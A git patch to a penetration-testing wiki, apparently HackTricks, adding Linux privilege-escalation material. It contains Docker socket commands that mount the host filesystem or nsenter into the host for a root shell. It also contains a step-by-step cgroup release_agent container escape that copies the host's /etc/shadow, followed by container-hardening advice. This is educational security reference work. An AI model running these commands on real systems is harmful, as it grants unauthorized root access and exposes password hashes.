From 6283f1edf11484b73add79fcc5f829fd4f7e59b0 Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 26 Aug 2020 15:52:43 +0000 Subject: [PATCH] GitBook: [master] 366 pages modified --- SUMMARY.md | 1 + linux-unix/privilege-escalation/README.md | 13 ++++++ .../escaping-from-a-docker-container.md | 42 +++++++++++++++++++ .../interesting-groups-linux-pe/README.md | 11 ++--- 4 files changed, 59 insertions(+), 8 deletions(-) create mode 100644 linux-unix/privilege-escalation/escaping-from-a-docker-container.md diff --git a/SUMMARY.md b/SUMMARY.md index c9a24324..3294ea67 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -20,6 +20,7 @@ * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md) * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md) + * [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md) * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md) diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md index ffe6f83a..b609e9f9 100644 --- a/linux-unix/privilege-escalation/README.md +++ b/linux-unix/privilege-escalation/README.md @@ -463,6 +463,19 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. +### Writable Docker Socket + +The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group. +If for some reason **you have write permissions** over that socket you can escalate privileges. +The following commands can be used to escalate privileges: + +```bash +docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + +Note that if you have write permissions over socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). + ## **D-Bus** D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md new file mode 100644 index 00000000..583826d7 --- /dev/null +++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md @@ -0,0 +1,42 @@ +# Escaping from a Docker container + +### SYS\_ADMIN capability and AppArmor disabled + +{% hint style="info" %} +Note that these aren't default settings +{% endhint %} + +```text +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash +``` + +Then in the container, we are going to run these commands. + +```text +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab` +echo “$host_path/cmd” > /tmp/cgrp/release_agent +echo ‘#!/bin/sh’ > /cmd +echo “cat /etc/shadow > $host_path/shadow” >> /cmd +chmod a+x /cmd +sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs” +``` + +Once you execute the above commands, you can see the host OS’s passwords in /shadow folder + +```text +cat /shadow +``` + +As we can see we were able to break out of the container. Suffice to say, we abused misconfigurations to escape a container. +This wouldn’t have happened if the non-root user was used, SYS\_ADMIN and AppArmor profile wasn’t disabled. +In short, + +1. Do not use –privileged flag, it disables all the security mechanisms placed by docker. +2. Do not mount root volumes into the containers. +3. Do not mount docker.sock inside the containers. +4. Default docker settings are sane, please do not disable them or add more capabilities. +5. Use SecComp and AppArmor profiles to harden the container. +6. Do not run containers as the root user. + diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md index 62b25455..05b311a7 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md @@ -158,7 +158,9 @@ find / -group root -perm -g=w 2>/dev/null ## Docker Group -You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. +You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. + +You can start reading [**this post about how to escalate privileges abusing the docker socket where you have write permissions**](../#writable-docker-socket). {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} @@ -197,13 +199,6 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` -More docker privilege escalation using the Docker Socket. - -```text -sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash -sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh -``` - ## lxc/lxd Group {% page-ref page="./" %}